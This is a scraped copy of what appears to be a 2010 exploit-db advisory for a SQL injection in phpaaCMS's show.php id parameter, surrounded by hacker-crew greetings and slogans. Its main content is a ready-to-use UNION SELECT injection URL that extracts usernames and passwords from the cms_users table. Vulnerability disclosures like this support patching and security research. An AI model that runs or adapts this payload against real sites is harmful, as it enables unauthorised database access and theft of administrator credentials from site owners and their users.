扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 |
#Exploit Title: phpaaCms (show.php?id=) SQL injection Vulnerable # Software http://www.phpaa.cn # Tested on: win 7 # category: webapp # Code : n/a +++++++++++++++++++++++++++++++++++++++++++++++++++++++ MWUHH TO Bl00dMafia: KashmiriMafia, Mirpuri, Mirzatun: gula, Boby, Mota & aSIM^JARRAL ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Gr33tz toAll PakISTANI Hackers +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ----- [ Founder ] ----- Shafiq-Ur-rehman ----- [ Email] ----- aol.shafiq@gmail.com +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ {{{{TITLE}}} PHPAA (show.php) Sql injection Vulnerable +++++[ Vendor ]+++++ http://www.phpaa.cn ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ----- [ SQL Injection ] ----- Put [SQL CODE] [Link] http://server/phpaaCMS/show.php?id=1[SQL CODE] {Tested On} ----- [ Live Link (s) ] ----- [SQLi] http://<server>/show.php?id=1[CODE] [SQLI] http://server/phpaaCMS/show.php?id=-194 union all select 1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15 from cms_users-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Thanks To All: www.Exploit-db.com | Ksecurity-team Members| -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-muwhhh>>> http://www.sql-injection-tools.blogspot.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= >>Live Long Pakistan<< >>> Live Long Azad Kashmir<<< >>> Proude To Be A Kashmiri+Pakistani<<< >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Bug discovered : 4 July 2010 |
体验盒子
